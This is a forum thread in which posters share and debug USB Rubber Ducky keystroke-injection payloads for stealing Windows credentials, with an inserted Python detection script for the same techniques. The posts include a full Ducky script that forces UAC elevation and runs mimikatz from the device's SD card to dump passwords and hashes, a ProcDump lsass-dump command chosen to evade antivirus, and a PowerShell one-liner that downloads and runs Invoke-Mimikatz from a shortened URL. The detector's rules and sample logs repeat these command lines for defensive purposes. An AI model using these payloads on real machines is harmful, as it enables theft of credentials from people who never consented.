gentilkiwi Posted August 25, 2014: It seems you don't have UAC ;) otherwise ALT o will validate the UAC prompt ;)
zardoz Posted August 26, 2014: Indeed!! You are right! On my sandbox machine I don't have UAC enabled :D that's why... So I erased these lines and the script worked perfectly. BUT... if I use it with UAC enabled, I have a problem. The command "ALT y" works fine manually, yes, but the problem is that the UAC pop-up is not automatically in front. Sorry for my bad English. I mean, if I click on the UAC pop-up and press ALT y myself, OK, it works. But I need to click on the pop-up; if not, it seems the cmd window is in front (I don't know the term in English). In French: it's as if the UAC window isn't selected automatically, so my ALT y command does nothing, since it acts on the "cmd" window :( So the command to say "yes, I want to authorize" on UAC, "ALT y", is not understood by the PC. Am I the only one to have this problem? Is there a command to select the UAC pop-up before pressing ALT y? :) (Edited August 26, 2014 by zardoz)
gentilkiwi Posted August 26, 2014: Fortunately I can understand you easily ;) Never seen that... but you can try to add:

ALT-TAB
DELAY 500

before the ALT o / ALT y ;) Focused or not, it can't be so bad, no? Let me know ;)
zardoz Posted August 26, 2014: OK, so I tried to add ADD TAB and ADD-TAB, but it didn't work. I also tried SHIFT ALT TAB and SHIFT-ALT-TAB, but it seems these commands are not recognized by the Ducky. So I changed the way to access an admin cmd, using the code from shutin:

REM Bypass UAC
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER

and it worked :) (Edited August 28, 2014 by zardoz)
zardoz Posted August 29, 2014: "I've been reading a tutorial about how you can just use the Sysinternals tool Procdump.exe to generate the dmp file like this:

procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp

The beauty here is that procdump will not get flagged by AV like mimikatz already is (6/xx on VirusTotal already) because it's an official Microsoft utility! All we need is to have the Ducky run procdump and put the file on the Duck, and then we can run mimikatz on it later on our own PC. How come everyone always wants the Duck to grab things from the internet? We have the capability to save files on the Ducky, so why not use that instead?"

Any news on that? It could be nice! Indeed, mimikatz is great, but it doesn't survive when you plug the Ducky into a random machine with AV.
gentilkiwi Posted August 29, 2014: Of course it works too, but it's much slower ;) Do your own mimikatz version! (open source)
MB60893 Posted August 31, 2014: I see one serious problem with these scripts, and that is that you are effectively downloading Mimikatz to the target machine and executing it. Mimikatz is easily set off by an AV such as Microsoft Security Essentials. I find that the best way of using Mimikatz is this PowerShell one-liner:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" >> %USERPROFILE%\creds.txt

This script checks the architecture of the PC, then downloads the correct .dll file needed for the execution of Mimikatz. Much cleaner than having to download and store the Mimikatz .exe file.
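The techniques traded in the posts above (a ProcDump full dump of lsass written to the Duck, the IEX/DownloadString cradle that runs Invoke-Mimikatz without touching disk, the scripted runAs elevation and the mimikatz module::command strings in the Ducky scripts) all leave a recognizable process command line behind. The following detection pass over process-creation records is an added example for this thread, not code from any poster or from mimikatz; the log records, their key=value field layout and the rule names are constructed here. It also shows the obvious gap: the lsass rule keys on the process name, so `procdump -ma <pid>` or a renamed binary slips past it, which is why in practice this is paired with Sysmon Event ID 10 (ProcessAccess against lsass.exe) rather than used alone.

```python
"""Flag credential-dumping tradecraft in process-creation telemetry.

Input records mimic a flattened Security 4688 / Sysmon Event 1 line with a
CommandLine= field. Added example; all sample records are constructed.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Each rule: every regex in the list must match the command line (AND),
# case-insensitively. Kept deliberately narrow to avoid noise from admins
# running ProcDump or PowerShell for legitimate reasons.
RULES = {
    # Sysinternals ProcDump full memory dump (-ma) of lsass.
    "lsass_dump_procdump": [r"procdump", r"\s-ma\b", r"\blsass(?:\.exe)?\b"],
    # Script fetched over HTTP and executed in memory (IEX + DownloadString).
    "powershell_download_cradle": [
        r"powershell",
        r"\b(?:iex|invoke-expression)\b",
        r"downloadstring|downloadfile",
    ],
    # mimikatz module::command syntax passed on the command line.
    "mimikatz_cli_syntax": [r"\b(?:sekurlsa|privilege|samdump|lsadump|kerberos)::"],
    # Scripted elevation through the UAC consent prompt.
    "scripted_uac_elevation": [r"start-process", r"-verb\s+runas"],
}


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    command_line: str


def parse_command_line(record: str) -> Optional[str]:
    """Extract the CommandLine= field; it is always the last field here."""
    m = re.search(r"CommandLine=(.*)$", record)
    return m.group(1).strip() if m else None


def match_rules(command_line: str) -> List[str]:
    """Return the names of every rule whose patterns all match."""
    return [
        name
        for name, patterns in RULES.items()
        if all(re.search(p, command_line, re.IGNORECASE) for p in patterns)
    ]


def scan(records: Iterable[str]) -> List[Finding]:
    findings: List[Finding] = []
    for line_no, record in enumerate(records, start=1):
        command_line = parse_command_line(record)
        if command_line is None:
            continue
        for rule in match_rules(command_line):
            findings.append(Finding(line_no, rule, command_line))
    return findings


# Constructed records: four malicious (1-4), two benign (5-6), one evasion (7).
SAMPLE_LOG = [
    r"EventID=4688 Host=WS01 User=alice ParentImage=C:\Windows\System32\cmd.exe "
    r"CommandLine=procdump.exe -accepteula -ma lsass.exe WS01_lsass.dmp",
    r"EventID=4688 Host=WS01 User=alice ParentImage=C:\Windows\System32\cmd.exe "
    r"""CommandLine=powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds\"""",
    r"EventID=4688 Host=WS01 User=alice ParentImage=C:\Windows\System32\cmd.exe "
    r'CommandLine=E:\mimikatz_alpha_x64.exe "privilege::debug" "sekurlsa::logonPasswords full" exit',
    r"EventID=4688 Host=WS01 User=alice ParentImage=C:\Windows\explorer.exe "
    r"CommandLine=powershell Start-Process cmd.exe -Verb runAs",
    r"EventID=4688 Host=WS01 User=bob ParentImage=C:\Windows\System32\cmd.exe "
    r"CommandLine=procdump.exe -accepteula -ma notepad.exe notepad.dmp",
    r"EventID=4688 Host=WS01 User=bob ParentImage=C:\Windows\explorer.exe "
    r"CommandLine=powershell -NoProfile -Command Get-Process",
    # PID instead of image name: the name-based lsass rule does NOT fire.
    r"EventID=4688 Host=WS01 User=alice ParentImage=C:\Windows\System32\cmd.exe "
    r"CommandLine=procdump.exe -accepteula -ma 624 C:\temp\x.dmp",
]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule}: {f.command_line}")
```

Record 7 is the caveat in code: nothing in the command line names lsass, so a command-line rule alone is insufficient and the lsass access itself (Sysmon Event ID 10 with a lsass.exe TargetImage) is the more robust signal.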
BeNe Posted October 9, 2014: This PowerShell script works perfectly! But most of the clients have a proxy with authentication enabled. Is there a way to use the system default proxy settings to get the script running? Or to put the PowerShell script and the needed DLL on the SD card? Mimikatz_xy.exe is set off by the AV; the script is not.
ElYpsilon Posted October 13, 2014: Hi, the script doesn't work on my Ducky... I have flashed the Twin Duck firmware, renamed the SD card to "DUCKY" and copied the code into the encoder... everything seems fine, but the payload does not run mimikatz... and doesn't save to the password .txt file on the micro SD card. I use the German keyboard layout and my target machines are only Win 7 64-bit. At the end of the script, the injected bin is opened by the editor, and then it's finished. Sorry for my extremely bad English... I use this code:

REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix
REM Description: Dump local wdigest passwords from memory using mimikatz
REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mimikatz from
REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt
REM Target: Windows 7 x64 (target win32 with 32-bit binary)
REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
REM (the delay value on the next line was lost in extraction; 1000 ms is assumed)
DELAY 1000
REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500
REM *** Execute mimikatz from SD card and save log file to disk ***
STRING %duck%\mimikatz_alpha_x64.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt
ENTER
REM *** GTFO ***
STRING exit
ENTER
STRING exit
ENTER

To bypass the UAC with a German keyboard layout, does ALT y also work like on the UK layout?
ElYpsilon Posted October 13, 2014: Hey... me again... I resolved the problem... I replaced ALT y with TAB TAB TAB... now it works ;-)
BeNe Posted October 14, 2014: If you use a German keyboard layout then you should use "ALT j" (j = ja).
ElYpsilon Posted October 14, 2014: Yeah, you're right... works!